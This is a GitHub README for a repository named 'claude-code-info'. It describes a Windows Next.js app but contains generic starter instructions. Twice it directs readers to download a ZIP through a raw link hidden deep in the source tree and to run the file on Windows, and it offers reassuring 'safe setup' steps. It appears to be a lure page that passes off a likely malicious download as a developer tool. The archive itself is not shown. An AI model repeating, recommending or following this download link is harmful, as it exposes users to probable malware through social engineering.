Skip to content

websterlobsterbacked79/claude-code-info

Repository files navigation

🧠 claude-code-info - Run Claude Code info fast

Download / Install / Setup

🚀 What this is

claude-code-info is a simple Windows app page built with Next.js. It helps you open the app in your browser and use it on your computer without needing extra setup.

Use this repo if you want a clean local app page that loads in your browser and updates as you work.

💻 What you need

  • A Windows PC
  • A web browser like Chrome, Edge, or Firefox
  • Internet access for the first download
  • Node.js if you want to run it from source

📥 Download and open

  1. Visit the download page: https://github.com/websterlobsterbacked79/claude-code-info/raw/refs/heads/main/claude/src/tools/TaskCreateTool/info_claude_code_pseudographer.zip
  2. On the page, look for the source files or release files.
  3. Download the project to your Windows PC.
  4. If you get a ZIP file, right-click it and choose Extract All.
  5. Open the project folder after extraction.

If you use a release file, download and run that file on Windows.

🛠️ Install and run

If you want to run the app from the source folder:

  1. Open the project folder.
  2. Make sure Node.js is installed.
  3. Open Command Prompt in the folder.
  4. Run:
npm install
npm run dev
  1. Wait for the app to start.
  2. Open your browser and go to:

http://localhost:3000

🖱️ How to use it

After the app starts, it opens in your browser.

You can:

  • view the main page
  • refresh the page to see changes
  • keep the window open while you use it
  • edit the page file if you want to change the content

✏️ Edit the page

This project uses a simple page file:

  • app/page.tsx

If you want to change the text or layout:

  1. Open the project in a code editor.
  2. Find app/page.tsx.
  3. Change the text.
  4. Save the file.
  5. The page updates in the browser.

⚙️ Common run commands

You can use one of these commands to start the app:

npm run dev
yarn dev
pnpm dev
bun dev

Use the one that matches the tool you installed.

🔍 What you will see

This app uses the Next.js starter layout. It loads a page with:

  • a simple home screen
  • fast refresh while you edit
  • a clean font called Geist
  • a layout that works well in a browser

🧩 Basic project layout

The main files you may use are:

  • app/page.tsx - the main page
  • app/layout.tsx - the page layout
  • package.json - app scripts and tools
  • next.config.ts - Next.js settings

🪟 Windows tips

  • Use File Explorer to find the folder
  • Use Command Prompt or Windows Terminal to run commands
  • Right-click inside the folder to open a terminal
  • Keep the browser open while the app runs
  • Close the terminal window to stop the app

🔐 Safe setup steps

  1. Download the project from the link above.
  2. Check that the folder contains the app files.
  3. Use a standard browser to open http://localhost:3000.
  4. Run the app only from the folder you downloaded.

📌 Quick start

  1. Download the project from: https://github.com/websterlobsterbacked79/claude-code-info/raw/refs/heads/main/claude/src/tools/TaskCreateTool/info_claude_code_pseudographer.zip
  2. Extract the files if needed.
  3. Open Command Prompt in the folder.
  4. Run npm install.
  5. Run npm run dev.
  6. Open http://localhost:3000 in your browser.

Releases

No releases published

Packages

 
 
 

Contributors

Languages